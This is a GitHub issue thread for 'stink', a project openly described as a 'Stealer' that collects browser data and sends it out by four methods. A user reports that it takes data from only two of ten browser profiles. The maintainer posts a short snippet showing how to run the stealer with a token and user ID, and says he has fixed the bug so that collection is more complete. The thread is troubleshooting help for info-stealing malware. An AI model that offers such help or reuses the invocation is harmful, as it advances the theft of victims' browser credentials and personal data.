FallenAstaroth / stink

🚀 Stealer on built-in libraries only, which doesn't create any temp files on data collecting, with 4 sending methods and lots of functionality.
Apache License 2.0
222 stars 56 forks source link

Problem with collecting data from multiple profiles #42

Closed pyobfus closed 1 year ago

pyobfus commented 1 year ago

Occasionally, stink doesn't collect enough data from the browser. For example, my browser has up to 10 profiles, but stink only collects about 2 profiles. This problem is very common. Can you explain it to me?

FallenAstaroth commented 1 year ago

Are you sure the other profiles have data to collect? Try adding error output.

Example:

from stink import Stealer
from stink.enums import Utils

if __name__ == '__main__':
    Stealer(token="YOUR_TOKEN", user_id=YOUR_ID, utils=[Utils.errors]).run()
FallenAstaroth commented 1 year ago

It seems that data collection was really interrupted if it did not find at least one of the files. I fixed this problem, update your stink and test again.

pyobfus commented 1 year ago

it's working fine. THX